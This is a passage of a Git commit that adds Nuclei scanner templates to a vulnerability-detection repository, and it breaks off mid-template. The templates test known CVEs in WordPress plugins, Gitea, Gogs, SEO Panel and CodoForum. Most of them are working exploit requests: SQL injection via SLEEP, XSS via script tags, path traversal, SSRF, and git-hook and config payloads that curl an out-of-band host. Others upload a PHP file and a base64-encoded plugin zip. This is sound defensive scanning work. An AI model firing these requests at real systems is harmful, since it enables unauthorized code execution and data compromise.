Merge pull request #6924 from projectdiscovery/templates1

CVE Templates
patch-1
Ritik Chaddha 2023-03-20 12:17:42 +05:30 committed by GitHub
commit 55d45baf57
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
24 changed files with 1307 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2020-11530
info:
name: Chopslider <= 3.4 - Unauthenticated Blind SQL Injection
author: theamanrawat
severity: critical
description: |
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
reference:
- https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a
- https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress
- https://nvd.nist.gov/vuln/detail/CVE-2020-11530
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11530
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,wpscan,wordpress,wp-plugin,wp,chopslider,unauth
requests:
- raw:
- |
@timeout 10s
GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/javascript")'
- 'contains(body, "$(document).ready(function()")'
condition: and

View File

@ -0,0 +1,98 @@
id: CVE-2020-14144
info:
name: Gitea Git Hooks Remote Code Execution
author: theamanrawat
severity: high
description: |
The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.
remediation: Fixed in version 1.16.7
reference:
- https://dl.gitea.io/gitea/1.16.6
- https://nvd.nist.gov/vuln/detail/CVE-2020-14144
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-14144
cwe-id: CWE-78
metadata:
verified: "true"
shodan-query: html:"Powered by Gitea Version"
tags: cve,cve2020,rce,gitea,authenticated
requests:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master
- |
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
- |
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
- |
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body_1
words:
- "Gitea:"
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="_csrf" value="(.*)"'
internal: true
- type: regex
name: auth_csrf
group: 1
regex:
- 'name="_csrf" content="(.*)"'
internal: true
- type: regex
name: last_commit
group: 1
regex:
- 'name="last_commit" value="(.*)"'
internal: true

View File

@ -0,0 +1,95 @@
id: CVE-2020-15867
info:
name: Gogs Git Hooks - Remote Code Execution
author: theamanrawat
severity: high
description: |
The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. There can be a privilege escalation if access to this hook feature is granted to a user who does not have administrative privileges.
reference:
- https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15867
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-15867
metadata:
verified: "true"
tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm
requests:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
- |
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
- |
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body_1
words:
- 'content="Gogs'
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="_csrf" value="(.*)"'
internal: true
- type: regex
name: auth_csrf
group: 1
regex:
- 'name="_csrf" content="(.*)"'
internal: true
- type: regex
name: last_commit
group: 1
regex:
- 'name="last_commit" value="(.*)"'
internal: true

View File

@ -0,0 +1,45 @@
id: CVE-2020-7107
info:
name: Ultimate FAQ < 1.8.30 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
The Ultimate FAQ plugin before 1.8.30 for WordPress allows XSS via Display_FAQ to Shortcodes/DisplayFAQs.php.
remediation: Fixed in version 1.8.30
reference:
- https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
- https://wordpress.org/plugins/ultimate-faqs/
- https://nvd.nist.gov/vuln/detail/CVE-2020-7107
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-7107
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2020,xss,wordpress,wp-plugin,wp,ultimate-faqs
requests:
- method: GET
path:
- "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'</script><svg/onload=alert(document.cookie)>"
- "var Display_FAQ_ID ="
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,43 @@
id: CVE-2021-24436
info:
name: W3 Total Cache < 2.1.3 - Reflected XSS in Extensions Page
author: theamanrawat
severity: medium
description: |
The W3 Total Cache WordPress plugin before 2.1.4 was vulnerable to a reflected Cross-Site Scripting (XSS) security vulnerability within the "extension" parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This could allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
remediation: Fixed in version 2.1.4
reference:
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
- https://wordpress.org/plugins/w3-total-cache/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24436
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24436
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=w3tc_extensions&extension="%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- status_code_2 == 200
- contains(body_2, '><script>alert(document.domain)</script>&action=view')
- contains(all_headers_2, "text/html")
condition: and

View File

@ -0,0 +1,43 @@
id: CVE-2021-24452
info:
name: W3 Total Cache < 2.1.5 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The W3 Total Cache WordPress plugin before 2.1.5 was affected by a reflected Cross-Site Scripting (XSS) issue within the "extension" parameter in the Extensions dashboard, when the 'Anonymously track usage to improve product quality' setting is enabled, as the parameter is output in a JavaScript context without proper escaping. This could allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
remediation: Fixed in version 2.1.5
reference:
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
- https://wordpress.org/plugins/w3-total-cache/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24452
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24452
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- status_code_2 == 200
- contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache')
- contains(all_headers_2, "text/html")
condition: and

View File

@ -0,0 +1,48 @@
id: CVE-2021-24862
info:
name: RegistrationMagic < 5.0.1.6 - Admin+ SQL Injection
author: theamanrawat
severity: high
description: |
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
remediation: Fixed in version 5.0.1.6
reference:
- https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615
- https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24862
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24862
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,registrationmagic,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(body_3, "rm_user_role_mananger_form")'
condition: and

View File

@ -0,0 +1,42 @@
id: CVE-2021-24970
info:
name: All-In-One-Gallery - Local File Inclusion
author: r3Y3r53
severity: high
description: |
The All-in-One Video Gallery WordPress plugin before 2.5.0 does not sanitise and validate the tab parameter before using it in a require statement in the admin dashboard, leading to a Local File Inclusion issue
remediation: Fixed in version 2.5.4
reference:
- https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
- https://wordpress.org/plugins/all-in-one-video-gallery
- https://nvd.nist.gov/vuln/detail/CVE-2021-24970
classification:
cve-id: CVE-2021-24970
metadata:
verified: "true"
tags: cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "All-in-One Video Gallery")'
- 'contains(body_2, "Hello world!")'
- 'contains(body_2, "Welcome to WordPress")'
condition: and

View File

@ -0,0 +1,51 @@
id: CVE-2021-28419
info:
name: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
author: theamanrawat
severity: high
description: |
The "order_col" parameter in archive.php of SEO Panel 4.8.0 is vulnerable to time-based blind SQL injection, which leads to the ability to retrieve all databases.
reference:
- https://github.com/seopanel/Seo-Panel/issues/209
- https://www.seopanel.org/spdownload/4.8.0
- https://nvd.nist.gov/vuln/detail/CVE-2021-28419
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-28419
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,seopanel,auth
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}login.php
Cookie: _csrf={{rand_base(54,"abc")}};
sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=
- |
GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_3>=6'
- 'status_code_3 == 200'
- 'contains(body_3, "Overall Report Summary")'
condition: and

View File

@ -0,0 +1,41 @@
id: CVE-2022-0206
info:
name: NewStatPress < 1.3.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not properly escape the whatX parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
remediation: Fixed in version 1.3.6
reference:
- https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9
- https://wordpress.org/plugins/newstatpress
- https://nvd.nist.gov/vuln/detail/CVE-2022-0206
classification:
cve-id: CVE-2022-0206
metadata:
verified: "true"
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,newstatpress,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=admin&pwd=admin123&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)")'
- 'contains(body_2, "newstatpress_page")'
condition: and

View File

@ -0,0 +1,116 @@
id: CVE-2022-0415
info:
name: Gogs < 0.12.6 - Remote Command Execution
author: theamanrawat
severity: high
description: |
Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.
remediation: Fixed in version 0.12.6
reference:
- https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
- https://nvd.nist.gov/vuln/detail/CVE-2022-0415
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-0415
cwe-id: CWE-78
metadata:
verified: "true"
tags: cve,cve2022,rce,gogs,authenticated
requests:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
Host: {{Hostname}}
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrf-Token: {{auth_csrf}}
Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395
-----------------------------313811965223810628771946318395
Content-Disposition: form-data; name="file"; filename="config"
Content-Type: application/octet-stream
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = curl http://{{interactsh-url}} -I
[remote "origin"]
url = git@github.com:torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
-----------------------------313811965223810628771946318395--
- |
POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
- type: word
part: body_1
words:
- 'content="Gogs'
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="_csrf" value="(.*)"'
internal: true
- type: regex
name: auth_csrf
group: 1
regex:
- 'name="_csrf" content="(.*)"'
internal: true
- type: regex
name: uuid
group: 1
regex:
- ' "uuid": "(.*)"'
internal: true

View File

@ -0,0 +1,73 @@
id: CVE-2022-1329
info:
name: Elementor Website Builder Remote Code Execution Vulnerability
author: theamanrawat
severity: high
description: |
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.
remediation: Fixed in version 3.6.3
reference:
- https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/
- https://wordpress.org/plugins/elementor/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1329
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-1329
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/ HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="action"
elementor_upload_and_install_pro
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="_nonce"
{{nonce}}
--336b29d7aee0463d8b651303eab505ea
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.zip"
{{base64_decode("UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=")}}
--336b29d7aee0463d8b651303eab505ea--
- |
GET /index.php?activate=1 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
internal: true
matchers-condition: and
matchers:
- type: word
part: body_4
words:
- '5f9bc5edd71c78284dabe630df8cd71d'

View File

@ -0,0 +1,53 @@
id: CVE-2022-1398
info:
name: External Media without Import <= 1.1.2 - Authenticated Blind SSRF
author: theamanrawat
severity: medium
description: |
The External Media without Import WordPress plugin through 1.1.2 does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks.
reference:
- https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e
- https://wordpress.org/plugins/external-media-without-import/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1398
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2022-1398
cwe-id: CWE-981
metadata:
verified: "true"
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/upload.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
urls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body_2
words:
- "external-media-without-import"

View File

@ -0,0 +1,85 @@
id: CVE-2022-31854
info:
name: CodoForum v5.1 - Remote Code Execution
author: theamanrawat
severity: high
description: |
Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
reference:
- https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
- https://nvd.nist.gov/vuln/detail/CVE-2022-31854
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31854
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,codoforumrce,authenticated
requests:
- raw:
- |
POST /admin/?page=login HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB
------WebKitFormBoundaryACGPpj7UIqmtLNbB
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryACGPpj7UIqmtLNbB
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryACGPpj7UIqmtLNbB--
- |
GET /admin/index.php?page=config HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/index.php?page=config HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition: form-data; name="site_title"
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition: form-data; name="forum_logo"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php
<?php
echo md5('CVE-2022-31854');
?>
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition: form-data; name="CSRF_token"
{{csrf}}
------WebKitFormBoundaryoLtdjuqj2ixPvBhA--
- |
GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(content_type_4, "text/html")'
- 'contains(body_4, "a63fd49130de6406a66600cd8caa162f")'
condition: and
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="CSRF_token" value="([0-9a-zA-Z]+)"/>'
internal: true

View File

@ -0,0 +1,43 @@
id: CVE-2022-3908
info:
name: Helloprint < 1.4.7 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in version 1.4.7
reference:
- https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505
- https://wordpress.org/plugins/helloprint/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3908
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,helloprint,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=language-translate.php&success=added"><script>alert(`XSS`)<%2Fscript> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Translation added\\\"><script>alert(`XSS`)</script> successfully")'
condition: and

View File

@ -0,0 +1,44 @@
id: CVE-2022-3933
info:
name: Essential Real Estate - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.
remediation: Fixed in version 3.9.6
reference:
- https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
- https://wordpress.org/plugins/essential-real-estate/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3933
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,essential-real-estate,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
